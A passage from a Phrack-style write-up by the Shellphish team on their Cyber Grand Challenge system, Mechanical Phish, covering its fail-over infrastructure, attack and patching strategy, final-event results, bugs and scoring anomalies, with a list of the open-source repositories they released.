+  Worker was the executor for analysis tasks of the CRS. It wrapped tools
+  such as angr, Driller, and Patcherex in a generic interface so that they
+  could be managed easily. In fact, every Worker instance referred to an
+  entry in a jobs queue specifying task arguments and type. Since some of
+  the workers had to execute CGC DECREE binaries for functionality and
+  performance evaluation, we included a DECREE virtual machine running on
+  QEMU within a worker.
+
+
+--[ 005.002 - Dynamic Resource Allocation
+
+Another advantage of our architecture design, alongside dependency
+isolation and ease of deployment, was the possibility of dynamically
+scaling components to meet our needs. Except for the PostgreSQL database
+and some internal Kubernetes services, all our components could run on any
+node without limitation.
+
+Furthermore, when creating a job, Meister assigned it a priority based on
+the component and the current game status. 
For example, crash-generation
+jobs (Rex) were prioritized lower if an input crash was not considered
+reliable, or the analysis of a de-fielded CB was considered of no
+importance at all. Intuitively, all created jobs were sorted by descending
+values of priority, and scheduled through the Kubernetes API until all
+nodes' resources (CPU and memory) were saturated. Once all node resources
+were taken by running jobs, Meister killed jobs with lower priority to
+accommodate new higher priority jobs, but it did not over-provision.
+
+
+--[ 005.003 - Fail-over
+
+Mechanical Phish was required to run without failure for the duration of
+the CFE, an estimated 10 hours. Furthermore, no debugging sessions were
+permitted, and the CRS was recommended to be resistant to minor hardware
+failure (or it risked "crashing and burning").
+
+To improve the reliability and resiliency of Mechanical Phish, we took
+various steps. First, every component, including Ambassador, Meister,
+Scriba, Network Dude, and Workers, was deployed as a Docker container. All
+components were designed to be entirely stateless, allowing us to restart
+them and move them across nodes if necessary.
+
+Although components could be terminated abruptly without any significant
+consequence, some components were critical and were required to be running
+for Mechanical Phish to function correctly: These were Ambassador, Network
+Dude, Scriba, and Meister (crashing and recovering was acceptable for these
+components). Fortunately, Kubernetes provided a way to define
+always-running instances through DaemonSet and ReplicationController
+resources. If an instance of this type was terminated or timed out, it was
+automatically relaunched on another node (to prevent Kubernetes from being
+a single point of failure, Mechanical Phish used a highly-available
+Kubernetes setup with multiple masters and virtual IP addresses for
+access). 
+ +* Database + + Naturally, the entire system cannot be completely stateless, and a single + stateful component is required, which was Farnsworth. To prevent any + failure of the node running the PostgreSQL Docker containers or the + containers themselves, we leveraged PostgreSQL's built-in master-slave + streaming replication for a resilient system. Specifically, for the CFE, + we ran 5 instances on 5 different physical nodes evenly spread across the + rack, and an additional health-checking monitoring service. The monitor + service itself was run using a ReplicationController resource. If the + master database container would have been considered dead by the monitor, + a slave instance would have been elected as the new master and a + replacement slave would have been created on a healthy node. To prevent + components from failing during database disaster recovery, they accessed + the database in a retry loop with exponential back-off. In turn, it would + have ensured that no data would have been lost during the transition from + a slave to master. + +* CGC Access Interfaces + + The CGC CFE Trials Schedule defined that specific IP addresses were + required to communicate with the CGC API. Given the distributed nature of + our CRS and the recommendation to survive failure, the IP addresses + remained the last single point of failure as specific components needed + to be run on specific physical hosts. Consequently, we used Pacemaker and + Corosync to monitor our components (Ambassador and Network Dude), and + assign the specific IP addresses as virtual IP addresses to a healthy + instance: if a node failed, the address would move to a healthy node. + + + +--[ 006 - Strategy + +---;;;;;;;-----'''''''''``' --- `' .,,ccc$$hcccccc,. `' ,;;!!!'``,;;!!' +;;;;,,.,;-------''''''' ,;;!!- .zJ$$$$$$$$$$$$$$$$$$$c,. `' ,;;!!!!' ,; + ```' -;;;!'''''- `.,.. .zJ$$$$$$$$$$$$$$$$$$$$$$$$$$c, `!!'' ,;!!' 
+!!- ' `,;;;;;;;;;;'''''```' ,c$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$c, ;!!'' ,; +,;;;!!!!!!!!''``.,;;;;!'`' z$$$$$$$$???"""""'.,,.`"?$$$$$$$$$$$ ``,;;!!! +;;.. --''```_..,;;! J$$$$$$??,zcd$$$$$$$$$$$$$$$$$$$$$$$$h ``'``' +```''' ,;;''``.,.,;;, ,$$$$$$F,z$$$$$$$$$$$$$$$$$$$c,`""?$$$$$h +!!!!;;;;, --`!''''''' $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$h.`"$$$$h . +`'''``.,;;;!;;;--;; zF,$$$$$$$$$$?????$$$$$$$$$$$$$?????$$r ;?$$$ $. +!;.,..,.````.,;;;; ,$P'J"$$$$$$P" .,c,,.J$$$$$$$$$"',cc,_`?h.`$$$$ $L +'``````' .,.. ,$$". $ $$$$P",c$$$$$$$$$$$$$$$$',$$$$$$$$$$ $$$$ $$c, +!!!!!!!!!!!!!''' J$',$ $.`$$P c$$$$$$$$$$$$$$$$$$,$$$$$$$$$$$ $$$$ $$$$C + `` J$ ,$P $$ ?$',$$$$???$$$$$$$$$$$$$$$??"""?$$$ <$$$ $$$$$ +c ;, z$F,$$ `$$ $ ?$" "$$$.?$$$ $$$P c??c, ?$.<$$',$$$$$F +$$h. -!> (' $" $F ,F ?$ $ F ,="?$$c,`$$F $$"z$$',$' ,$$P $h.`$ ?$$$$$r +$$$$$hc,. ``' J$ $P J$ . $$F L ",,J$$$F <$hc$$ "$L,`??????,J$$$.` z$$$$$ +$$$$$$$$$$c,'' ?F,$',$F.: $$ c$c,,,,,c,,J$$$$$$$ ?$$$c,,,c$$$$$$F. $$$$$$ +`"$$$$$$$$$$$c, $$',$$ :: $$$$$$$$F"',$$$$$$$$$$h ?$$$L;;$$$??$$$$ $$$$$$ + "?$$$$$$$$$$ $$$$$$ : .`F"$$$$$$$$$$$$""""?"""h $$$$$$$"$,J$$$$ $$$$$' + "?$$$$$$$ $$$$$$.`.` h `$$$$$$$$$$$cccc$$c,zJ$$$$$P' $$$$$P',$$$$P +$. `""?$$ $$$$$$$ ` "$c "?$$$$$$$$$$$$??$$$$$$$$" ,J$$$P",J$$$$P +.. `" ?$$$$$$h ?$$c.`?$$$$$$$$$' . <$$$$$' ,$$$" ,$$$$$" +!!>. . `$$$$$$$h . "$$$c,"$$$$$$$' `' `$$$P ,$$$' ,c$$$$$' ;! +``` `$$$$$$$c "$$$c`?$$$$$ : : $$$ ,$$P' z$$$$$$' ;!! +$hc ```' ; `$$$$$$$. ?$$c ?$$$$ .: : $$$ $$F ,J$$$$$$' ;!! +.,.. ' `$$$$$$$ "$$h`$$$$ .' ' $$$ ,$$ ,J$$$$$$' !!! +????P `$$$$$$L $$$ $$$F :.: J$$P J$F J$$$$$P ;!! +-=< ?$$."$$ `$$ ?$$' `' z$$$F $P $$$$$$' !!' +cc `$$$c`? ?$.`$$hc, cd$$F ,$' $$$$$$ ;!! + $$$$c `$$c$$$$$$$$$",c$' $$$$$$ `!! + $$$$$ `?$$$$$$$$$$$$P' $$$$$$> .. + $$$$$ `"?$$$$$$$P" $$$$$$L $$c, + !! <$$$$$ zc,`"""', <$$$$$$.`$$$$cc, + !! J$$$$P `$$$$$$$' !' $$$$$$L `$$$$$$h + ;, $$$$$L `! J$$$$$',!! $$$$$$$ `$$$$$$ + ' <$$$$$. ! $$$$$$ !! ?$$$$$$ `$$$$$ + ,$$$$$$$c `,`???? 
;' c,?$$$$' `?$$$ + $$$$$$$?? `!;;;;! . `h."?$P `$$$ + ,$$$$$$$h. `''' `' `$$$P `?$ + $$$$$$$$h `!' `"' ` + `$$$$$$$$F !; ! ;, + `$$$$$$$' `!!> `! +c, ;, `?$$$$P !!> . +$F !!> `""' `!! ;!> <- + The General Strategy of Shellphish + +The Mechanical Phish was only about three months old when the final event +of the Cyber Grand Challenge took place. Like any newborn, its strategic +thought processes were not well developed and, unfortunately, the +sleep-deprived hackers of Shellphish were haphazard teachers at best. In +this section, we describe what amounted to our game strategy for the +Mechanical Phish and how the rules of the Cyber Grand Challenge, combined +with this strategy, impacted the final result. + + +* Development Strategy + + +The Shellphish CGC team was comprised completely of researchers at the UC +Santa Barbara computer security lab. Unfortunately, research labs are +extremely disorganized environments. Also unfortunately, as most of us were +graduate students, and graduate students need to do research to survive +(and eventually graduate), we were fairly limited in the amount of time +that we could devote to the CGC. For example, for the CGC Qualification +Event, we built our CRS in two and a half weeks. For the final event, we +were able to devote a bit more time: on average, each member of the team +(the size of which gradually increased from 10 to 13 over the course of the +competition) probably spent just under three months on this insanity. + +One thing that bit us is that we put off true integration of all of the +components until the last minute. This led to many last-minute performance +issues, some of which we did not sort out before the CFE. + + +* Exploitation Strategy + +Our exploitation strategy was simple: we attack as soon and as frequently +as possible. The only reason that we found to hold back was to avoid +letting a victim team steal an exploit. 
However, there was not enough
+information in the consensus evaluation to determine whether a team did or
+did not have an exploit for a given service (and attempting to recover this
+fact from the network traffic was unreliable), so we decided on a "Total
+War" approach.
+
+
+* Patching Strategy
+
+For every CS, among the non-failing RBs, we submitted the one considered
+the most likely to have the best performance score. Specifically, given the
+way in which RBs were created, we ranked RBs according to the following
+list: Optimized Reassembled RB, Reassembled RB, Detouring RB. This choice
+was motivated by the fact that detouring is slow (as it causes cache
+flushes due to its propensity to jump to many code locations), whereas the
+generated optimized RBs are fast. Of course, we could not always rely on
+the reassembler (and optimizer) to produce a patch, as these backends had
+some failure cases.
+
+For every patch submitted, the corresponding CS was marked down for a
+round. Because this can be (and, in the end, was) debilitating to our
+score, we evaluated many strategies with regard to patching during the
+months before the CFE. We identified four potential strategies:
+
+- Never patch: The simplest strategy was to never patch. This has the
+  advantage of nullifying the chances of functionality breakages and
+  avoiding the downtime associated with patching.
+
+- Patch when exploited: The optimal strategy would be to patch as soon as
+  we detected that a CS was being exploited. Unfortunately, detecting when
+  a CS is exploited is very difficult. For example, while the consensus
+  evaluation does provide signals that the binaries cause, these signals do
+  not necessarily correlate with exploitation. Furthermore, replaying
+  incoming traffic to detect exploitation is non-trivial due to complex
+  behaviors on the part of the challenge binaries. 
+
+- Patch after attacking: An alternative strategy is to assume that an
+  opponent can quickly steal our exploits, and submit a patch immediately
+  after such exploits are fired. In our later analysis, we determined that
+  this would have been the optimal strategy, granting us first place.
+
+- Always patch: If working under the assumption that the majority of
+  challenge sets are exploited, it makes sense to always patch.
+
+Most teams in the Cyber Grand Challenge took this decision very seriously.
+Of course, being the rag-tag group of hackers that we are, we did some
+fast-and-loose calculations and made a decision based on data that turned
+out to be incorrect. Specifically, we assumed that a similar fraction of
+the challenges would be exploited as the fraction of challenges crashed
+during the CQE (about 70%). At the time, this matched up with the
+percentage of sample CGC binaries, provided by DARPA during sparring
+partner rounds, that we were exploiting. Running the numbers under this
+assumption led us to adopt the "always patch" approach:
+
+1. At the second round of a challenge set's existence, we would check if we
+   had an exploit ready. If not, we would patch immediately, with the best
+   available patch (out of the three discussed above). Otherwise, we would
+   delay for a round so that our exploit had a chance to be run against
+   other teams.
+
+2. Once a patch was deployed, we would monitor performance feedback.
+
+3. If feedback slipped below a set threshold, we would revert to the
+   original binary and never patch again.
+
+In this way, we would patch *once* for every binary. As we discuss later,
+this turned out to be one of the worst strategies that we could have taken.
+
+
+
+--[ 007 - Fruits of our Labors
+
+In early August, our creation had to fight for its life, on stage, in front
+of thousands of people. 
The Mechanical Phish fought well and won third
+place, netting us $750,000 and cementing our unexpected place as the
+richest CTF team in the world (with combined winnings of 1.5 million
+dollars, Shellphish is the first millionaire CTF team in history!).
+
+This is really cool, but it isn't the whole story. The CGC generated
+enormous amounts of data, and to truly understand what happened in the
+final event, we need to delve into it. In this section, we'll talk
+specifically about what happened, who achieved what, and how the CGC
+Final Event played out.
+
+For reference throughout this section, the final scores of the CGC Final
+Event were:
+
+ +--------------+------------------+---------+
+ | Team         | CRS Name         | Points  |
+ +--------------+------------------+---------+
+ | ForAllSecure | Mayhem           | 270,042 |
+ | TECHx        | Xandra           | 262,036 |
+ | Shellphish   | Mechanical Phish | 254,452 |
+ | DeepRed      | Rubeus           | 251,759 |
+ | CodeJitsu    | Galactica        | 247,534 |
+ | CSDS         | Jima             | 246,437 |
+ | Disekt       | Crspy            | 236,248 |
+ +--------------+------------------+---------+
+
+The attentive reader will notice that the score of the Mechanical Phish is
+the only one that is a palindrome.
+
+
+--[ 007.001 - Bugs
+
+The CGC was the first time that autonomous systems faced each other in a
+no-humans-allowed competition. As such, all of the Cyber Reasoning Systems
+likely faced some number of bugs during the CFE. The most visible was
+Mayhem's, which resulted in the system being off-line for most of the
+second half of the game (although, as we discuss later in this section,
+that might not have hurt the system as much as one would think). Our
+system was no different. In looking through the results, we identified a
+number of bugs that the Mechanical Phish ran into during the CFE:
+
+* Multi-CB pipeline assertions
+
+We used fuzzing to identify crashes and POV Fuzzing to fuzz those crashes
+into POVs for challenge sets comprising multiple binaries. 
+Unfortunately, an accidental assert statement placed in the POV Fuzzing +code caused it to opt out of any tasks involving multi-CB challenge sets, +disabling our multi-CB exploitation capability. + +* Network traffic synchronization + +Due to a bug, the component that scheduled tasks to synchronize and analyze +network traffic was set to download *all* recorded network traffic every +minute. The volume of this traffic quickly caused it to exceed scheduling +timeouts, and Mechanical Phish only analyzed network traffic for the first +15 rounds of the game. + +* RB submission race condition + +Due to a race condition between the component that determined what patches +to submit and the component that actually submitted them, we had several +instances where we submitted different patched binaries across different +rounds, causing multiple rounds of lost uptime. + +* Scheduling issues + +Throughout the CFE, Mechanical Phish identified exploitable crashes in over +40 binaries. However, only 15 exploits were generated. Part, but not all, +of this was due to the multi-CB pipeline assertions. It seems that the +rest was due to scheduling issues that we have not yet been able to +identify. + +* Slow task spawning + +Our configuration of Kubernetes was unable to spawn tasks quickly enough to +keep up with the job queue. Luckily, we identified this bug a few days +before the CFE and put in some workarounds, though we did not have time to +fix the root cause. This bug caused us to under-utilize our +infrastructure. + + +--[ 007.002 - Pwning Kings + +Over the course of the CGC Final Event, the Mechanical Phish pwned the most +challenges out of the competitors and stole the most flags. This was +incredible to see, and is an achievement that we are extremely proud of. +Furthermore, the Mechanical Phish stole the most flags even when taking +into account only the first 49 rounds, to allow for the fact that Mayhem +submitted its last flag on round 49. 
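+
+The round-49 cutoff used for this comparison is straightforward to compute
+from per-round capture records. A small sketch follows; the record format
+is a hypothetical illustration, not code from the Mechanical Phish:
+
```python
# Tally captured flags per team, optionally truncated at a cutoff round.
# The (team, round, challenge_set) event format is an assumption made for
# illustration; the real CFE data is far richer.
from collections import defaultdict

def tally(captures, cutoff=None):
    """captures: iterable of (team, round, challenge_set) capture events."""
    totals = defaultdict(int)
    for team, rnd, _cs in captures:
        if cutoff is None or rnd <= cutoff:
            totals[team] += 1
    return dict(totals)

captures = [("shellphish", 3, "CS_01"), ("shellphish", 60, "CS_01"),
            ("mayhem", 49, "CS_02")]
assert tally(captures, cutoff=49) == {"shellphish": 1, "mayhem": 1}
assert tally(captures) == {"shellphish": 2, "mayhem": 1}
```
+
+Running the same tally with and without a cutoff yields the paired
+first-49/all counts shown in the chart that follows.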
+ +We've collected the results in a helpful chart, with the teams sorted by +the total amount of flags that the teams captured throughout the game. + ++--------------+-------------------------------+--------------------------+ +| Team | Flags Captured (first 49/all) | CSes Pwned (first 49/all)| ++--------------+-------------------------------+--------------------------+ +| Shellphish | 206 / 402 | 6 / 15 | +| CodeJitsu | 59 / 392 | 3 / 9 | +| DeepRed | 154 / 265 | 3 / 6 | +| TECHx | 66 / 214 | 2 / 4 | +| Disekt | 101 / 210 | 5 / 6 | +| ForAllSecure | 185 / 187 | 10 / 11 | +| CSDS | 20 / 22 | 1 / 2 | ++--------------+-------------------------------+--------------------------+ + +Interestingly, Mayhem exploited an enormous amount of binaries before it +went down, but the Mechanical Phish still achieved a higher exploitation +score in the rounds that Mayhem was alive. One possibility is that the +exploits launched by the Mechanical Phish were more reliable than those of +Mayhem. However, its raw exploitation power should not be underestimated: +within 49 rounds, before going off the grid, Mayhem managed to exploit 10 +binaries. While the Mechanical Phish surpassed it over the entire game, +this is still quite impressive. + + +--[ 007.003 - Patching Kings + +To understand how effective our patches were, we calculated the number of +flags lost (and the number of CSes on which flags were lost) throughout the +game, both for the first 49 rounds (in which Mayhem was online) and for the +entire game. As expected, because the Mechanical Phish patched every +binary, we found that it was the least-exploited CRS. Specifically, it only +leaked flags on 12 challenge sets. The runner-up in this sense (the +second-place team, TECHx), leaked flags on 14 binaries. + +Interestingly, TECHx beat us on the total number of flags leaked. This +makes sense -- they likely had some analysis to identify *when* they were +being exploited, and patch only then. 
And, likely, their patches were more +effective than our own, leading to a lower number of total flags leaked! + +The results, sorted by the number of compromised challenges, are: + ++--------------+-------------------------------+--------------------------+ +| Team | Defended CS-Rounds (49/all) | CSes Compromised (49/*) | ++--------------+-------------------------------+--------------------------+ +| Shellphish | 29 / 68 | 7 / 12 | +| TECHx | 27 / 61 | 7 / 14 | +| DeepRed | 32 / 87 | 6 / 15 | +| ForAllSecure | 54 / 160 | 7 / 16 | +| CodeJitsu | 61 / 104 | 9 / 16 | +| Disekt | 66 / 127 | 9 / 17 | +| CSDS | 108 / 189 | 9 / 18 | ++--------------+-------------------------------+--------------------------+ + + +--[ 007.004 - Patching Effectiveness + +Before the CFE, we tested our patches against the dataset of all CQE +binaries released until that point, compiled with many different +compilation flags. On this dataset, our chance of breaking a binary, or +lowering performance to below 85% (the guesstimated threshold at which we +would pull the binary back) was under 2%, and we decided to abandon patch +performance/functionality testing. On the actual CFE dataset, we fared +worse. + +The CFE had 82 challenge sets. For these 82 challenge sets, we successfully +generated patches for 78. Of these 78, we had to pull back 10 because the +patch broke the binary and 7 because the patch lowered the performance of +the binary below acceptable levels. This was considerably higher than +expected. Furthermore, due to a race condition between the patch submission +logic and the component that retrieves the game state, we did end up with +situations where we would submit *multiple* patches, thinking that the +round had not ended whereas, in reality, it had. In total, we made 107 RCB +submissions throughout the game. This was the second-highest amount, with +only CodeJitsu submitting more (108). 
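+
+The patch-once, monitor, revert-once rule described above amounts to a tiny
+state machine per challenge set. The following sketch uses illustrative
+names and assumes the guesstimated 0.85 availability threshold; it is not
+the CRS's actual code:
+
```python
# Sketch of the "patch once, monitor feedback, revert once" logic.
# The class name and the 0.85 threshold are illustrative assumptions.
class PatchedCS:
    THRESHOLD = 0.85  # guesstimated availability floor for pulling a patch

    def __init__(self, cs_id):
        self.cs_id = cs_id
        self.reverted = False

    def on_feedback(self, availability):
        """Called each round with the CS's availability score in [0, 1]."""
        if not self.reverted and availability < self.THRESHOLD:
            self.reverted = True   # go back to the original binary...
            return "revert"        # ...and never patch this CS again
        return "keep"

cs = PatchedCS("CS_42")
assert cs.on_feedback(0.99) == "keep"
assert cs.on_feedback(0.70) == "revert"
assert cs.on_feedback(0.70) == "keep"  # already reverted; stays unpatched
```
+
+Once a revert fires, the challenge set is permanently marked, matching the
+"never patch again" rule from our strategy.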
+ +Because very few challenges were exploited during the CFE, this was +unequivocally the wrong choice. In total, we lost around 17000 points +during the "downtime" rounds after the patch submissions alone. + + +--[ 007.005 - Alternate History Case Studies + +Hindsight is 20/20. Even though we know, now, that we made the wrong choice +regarding our patching strategy, it's still interesting to see what "could +have been". In this section, we do that. To better understand the impact of +our strategy decisions, we compute scores for several simulated CGC rounds +where the Mechanical Phish undertook different strategies, and see what +would have happened. + +It's very important to point out that this is all fantasy. *Every* team can +look back and consider things that they might have done differently. The +most obvious one is Mayhem: had they avoided crashing, they might have +absolutely dominated the competition, rather than relaxedly coasting to +victory. However, every other team has other "what if" moments. We explore +ours here purely out of curiosity. + +* Mechanical Phish that never patched + +To calculate our score in the absence of patching, we recalculated CFE +scores, assuming that, any time an exploit would be launched on a CS +against *any* team, the exploit would be run against us during that round +and all subsequent rounds of that CS being in play. With this calculation, +our score would be 267,065, which is 12,613 points higher than the patch +strategy that we did choose and would put us in second place by a margin of +over 5,000 points. + +The prize for second place was $1,000,000. Patching at all cost us +$250,000! + +* Mechanical Phish that patched after attacking + +Similar to the previous strategy, we calculated our score with a patch +strategy that would delay patches until *after* we launched exploits on the +corresponding CS. For the patches that would have been submitted, we used +the same feedback that we received during the CFE itself. 
With this
+calculation, our score would be 271,506, which is 17,054 points higher than
+the patch strategy that we chose and would have put us in first place by a
+margin of over 1,500 points.
+
+The prize for first place was $2,000,000. Patching stupidly cost us
+$1,250,000 and quite a bit of glory!
+
+* Mechanical Phish that didn't do crap
+
+We were curious: did we really have to push so hard and trade so much
+sanity away over the months leading up to the CGC? How would a team that
+did *nothing* do? That is, if a team connected and then ceased to play,
+would they fare better or worse than the other players? We ran a similar
+analysis to the "Never patch" strategy previously (i.e., we counted a CS as
+exploited for all rounds after its first exploitation against any team),
+but this time removed any POV-provided points. In the CFE, this "Team NOP"
+would have scored 255,678 points, barely *beating* Shellphish and placing
+3rd in the CGC.
+
+To be fair, this score calculation does not take into account the fact that
+teams might have withheld exploits because all opponents were patched
+against them. However, ForAllSecure patched only 10 binaries, so it does
+not seem likely that many exploits were held back due to the presence of
+patches.
+
+One way of looking at this is that we could have simply enjoyed life for a
+year, shown up to the CGC, and walked away with $750,000. Another way of
+looking at this is that, despite us following the worst possible strategy
+in regards to patching, the technical aspects of our CRS were good enough
+to compensate and keep us in the top three positions!
+
+
+--[ 007.006 - Scoring Difficulties
+
+Just as this was the first time that autonomous systems competed against
+each other in a no-humans-allowed match, it was also the first time that
+such a match was *hosted*. The organizing team was up against an
+astonishing number of challenges, from hardware to software to politics,
+and they pulled off an amazing event. 
+
+However, as in any complex event, some issues are bound to arise. In this
+case, the problem was that measuring program performance is hard. We found
+this out while creating our CRS, and DARPA experienced this difficulty
+during the final event. Specifically, we noticed two anomalies in the
+scoring data: slight disparities in the initial scoring of challenge sets,
+and performance "cross-talk" between services.
+
+* Initial CS Scoring
+
+Patches can only be fielded on round 3 (after being submitted on round 2)
+of a binary being deployed. However, we noticed that our availability
+scores were lower than our opponents', even on the *first* round of a
+challenge, when they could not yet be patched. In principle, these should
+all be the same, as a team has *no* way to influence this performance
+score. We calculated the average of the first-round CS availability
+scores, presented in the table below. The scores vary. The difference
+between the "luckiest" team, regarding their first-round CS score, and the
+"unluckiest" team was 1.6 percentage points. Unfortunately, Shellphish was
+that unluckiest team.
+
+Since the availability score was used as a multiplier for a team's total
+score, if the "luckiest" and "unluckiest" had their "luck" swapped, this
+would compensate for a total score difference of 3.2%. That is a bigger
+ratio than the difference between second and third place (2.9%), third and
+fourth place (1.1%), fourth and fifth place (1.7%), and fifth and sixth
+place (0.4%). The winner (Mayhem) could not have been unseated by these
+perturbations, but the rest of the playing field could have looked rather
+different. 
+
++--------------+----------------------------------+
+| Team         | Average First Round Availability |
++--------------+----------------------------------+
+| CSDS         | 0.9985                           |
+| ForAllSecure | 0.9978                           |
+| Disekt       | 0.9975                           |
+| TECHx        | 0.9973                           |
+| CodeJitsu    | 0.9971                           |
+| DeepRed      | 0.9917                           |
+| Shellphish   | 0.9824                           |
++--------------+----------------------------------+
+
+* Scoring Cross-talk
+
+We also noticed that performance measurements of one challenge seem to
+influence others. Specifically, when we patched the binary NRFIN_00066 on
+round 39, we saw the performance of *all* of our other, previously-patched,
+binaries drop drastically for rounds 40 and 41. This caused us to pull back
+patches for *all* of our patched binaries, suffering the resulting downtime
+and decrease in security.
+
+Anecdotally, we spoke to two other teams, DeepRed and CodeJitsu, that were
+affected by such scoring cross-talk issues.
+
+
+
+--[ 008 - Warez
+
+We strongly believe in contributing back to the community. Shortly after
+qualifying for the Cyber Grand Challenge, we open-sourced our binary
+analysis engine, angr. Likewise, after the CGC final event, we have
+released our entire Cyber Reasoning System. The Mechanical Phish is open
+source, and we hope that others will learn from it and improve it with us.
+
+Of course, the fact that we directly benefit from open-source software
+makes it quite easy for us to support open-source software. Specifically,
+the Mechanical Phish would not exist without amazing work done by a large
+number of developers throughout the years. We would like to acknowledge the
+non-obvious ones (i.e., of course we are all thankful for Linux and vim)
+here:
+
+* AFL (lcamtuf.coredump.cx/afl) - AFL was used as the fuzzer of every
+  single competitor in the Cyber Grand Challenge, including us. We all owe
+  lcamtuf a great debt.
+* PyPy (pypy.org) - PyPy JITed our crappy Python code, often cutting
+  runtime by a factor of *5*. 
+* VEX (valgrind.org) - VEX, Valgrind's Intermediate Representation of
+  binary code, provided an excellent base on which to build angr, our
+  binary analysis engine.
+* Z3 (github.com/Z3Prover/z3) - angr uses Z3 as its underlying constraint
+  solver, allowing us to synthesize inputs to drive execution down specific
+  paths.
+* Boolector (fmv.jku.at/boolector) - The POVs produced by the Mechanical
+  Phish required complex reasoning about the relation between input and
+  output data. To reduce implementation effort, we wanted to use a
+  constraint solver to handle these relationships. Because Z3 is too huge
+  and complicated to include in a POV, we ported Boolector to the CGC
+  platform and included it in every POV the Mechanical Phish threw.
+* QEMU (qemu.org) - The heavy analyses that angr carries out make it
+  considerably slower than qemu, so we used qemu when we needed
+  lightweight but fast analyses (such as dynamic tracing).
+* Unicorn Engine (www.unicorn-engine.org) - angr uses Unicorn Engine to
+  speed up its heavyweight analyses. Without Unicorn Engine, the number of
+  exploits that the Mechanical Phish found would have undoubtedly been
+  lower.
+* Capstone Engine (www.capstone-engine.org) - We used Capstone Engine to
+  augment VEX's analysis of x86, in cases when VEX did not provide enough
+  details. This improved angr's CFG recovery, making our patching more
+  reliable.
+* Docker (docker.io) - The individual pieces of our infrastructure ran in
+  Docker containers, making the components of the Mechanical Phish
+  well-compartmentalized and easily upgradeable.
+* Kubernetes (kubernetes.io) - The distribution of docker containers across
+  our cluster, and the load-balancing and failover of resources, were
+  handled by kubernetes. In our final setup, the Mechanical Phish was so
+  resilient that it could probably continue to function in some form even
+  if the rack was hit with a shotgun blast. 
+* Peewee (https://github.com/coleifer/peewee) - After an initial false + start with a handcrafted HTTP API, we used Peewee as an ORM to our + database. +* PostgreSQL (www.postgresql.org) - All of the data that the Mechanical + Phish dealt with, from the binaries to the testcases to the metadata + about crashes and exploits, was stored in a ridiculously-tuned and + absurdly replicated Postgres database, ensuring speed and resilience. + +As for the Mechanical Phish, this release is pretty huge, involving many +components. This section serves as a place to collect them all for your +reference. We split them into several categories: + +--[ 008.001 - The angr Binary Analysis System + +For completeness, we include the repositories of the angr project, which we +open sourced after the CQE. However, we released several additional +repositories after the CFE, so we list the whole project here. + +* Claripy + +Claripy is our data-model abstraction layer, allowing us to reason about +data symbolically, concretely, or in exotic domains such as VSA. It is +available at https://github.com/angr/claripy. + +* CLE. + +CLE is our binary loader, with support for many different binary formats. +It is available at https://github.com/angr/cle. + +* PyVEX. + +PyVEX provides a Python interface to the VEX intermediate representation, +allowing angr to support multiple architectures. It is available at +https://github.com/angr/pyvex. + +* SimuVEX. + +SimuVEX is our state model, allowing us to handle requirements of different +analyses. It is available at https://github.com/angr/simuvex. + +* angr. + +The full-program analysis layer, along with the user-facing API, lives in +the angr repository. It is available at https://github.com/angr/angr. + +* Tracer. + +This is a collection of code to assist with concolic tracing in angr. It is +available at https://github.com/angr/tracer. + +* Fidget. 
+ +During the CQE, we used a patching method, called Fidget, that resized and +rearranged stack frames to prevent vulnerabilities. It is available at +https://github.com/angr/fidget. + +* Function identifier. + +We implemented testcase-based function identification, available at +https://github.com/angr/identifier. + +* angrop. + +Our ROP compiler, allowing us to exploit complex vulnerabilities, is +available at https://github.com/salls/angrop. + + +--[ 008.002 - Standalone Exploitation and Patching Tools + +Some of the software developed for the CRS can be used outside of the +context of autonomous security competitions. As such, we have collected it +together in a separate place. + +* Fuzzer. + +We created a programmatic Python interface to AFL to allow us to use AFL as +a module, within or outside of the CRS. It is available at +https://github.com/shellphish/fuzzer. + +* Driller. + +Our symbolic-assisted fuzzer, which we used as the crash discovery +component of the CRS, is available at +https://github.com/shellphish/driller. + +* Rex. + +The automatic exploitation system of the CRS (and usable as a standalone +tool) is available at https://github.com/shellphish/rex. + +* Patcherex. + +Our automatic patching engine, which can also be used standalone, is +available at https://github.com/shellphish/patcherex. + + +--[ 008.003 - The Mechanical Phish Itself + +We developed enormous amounts of code to create one of the world's first +autonomous security analysis systems. We gathered the code that is specific +to the Mechanical Phish under the mechaphish github namespace. + + +* Meister. + +The core scheduling component for analysis tasks is at +https://github.com/mechaphish/meister. + +* Ambassador. + +The component that interacted with the CGC TI infrastructure is at +https://github.com/mechaphish/ambassador. + +* Scriba. + +The component that makes decisions on which POVs and RBs to submit is +available at https://github.com/mechaphish/scriba. + +* Docker workers. 
+
+Most tasks were run inside docker containers. The glue code that launched
+these tasks is available at https://github.com/mechaphish/worker.
+
+* VM workers.
+
+Some tasks, such as final POV testing, were done in a virtual machine
+running DECREE. The scaffolding to do this is available at
+https://github.com/mechaphish/vm-workers.
+
+* Farnsworth.
+
+We used a central database as a data store, and used an ORM to access it.
+The ORM models are available at https://github.com/mechaphish/farnsworth.
+
+* POVSim.
+
+We ran our POVs in a simulator before testing them on the CGC VM (as the
+latter is a more expensive process). The simulator is available at
+https://github.com/mechaphish/povsim.
+
+* CGRex.
+
+Used only during the CQE, we developed a targeted patching approach that
+prevents binaries from crashing. It is available at
+https://github.com/mechaphish/cgrex.
+
+* Compilerex.
+
+To aid in the compilation of CGC POVs, we collected a set of templates and
+scripts, available at https://github.com/mechaphish/compilerex.
+
+* Boolector.
+
+We ported the Boolector SMT solver to the CGC platform so that we could
+include it in our POVs. It is available at
+https://github.com/mechaphish/cgc-boolector.
+
+* Setup.
+
+Our scripts for deploying the CRS are at
+https://github.com/mechaphish/setup.
+
+* Network dude.
+
+The CRS component that retrieves network traffic from the TI server is at
+https://github.com/mechaphish/network_dude.
+
+* Patch performance tester.
+
+Though it was not ultimately used in the CFE, because performance testing
+is a very hard problem, our performance tester is at
+https://github.com/mechaphish/patch_performance.
+
+* Virtual competition.
+
+We extended the provided mock API of the central server to be able to more
+thoroughly exercise Mechanical Phish. Our extensions are available at
+https://github.com/mechaphish/virtual-competitions.
+
+* Colorguard. 
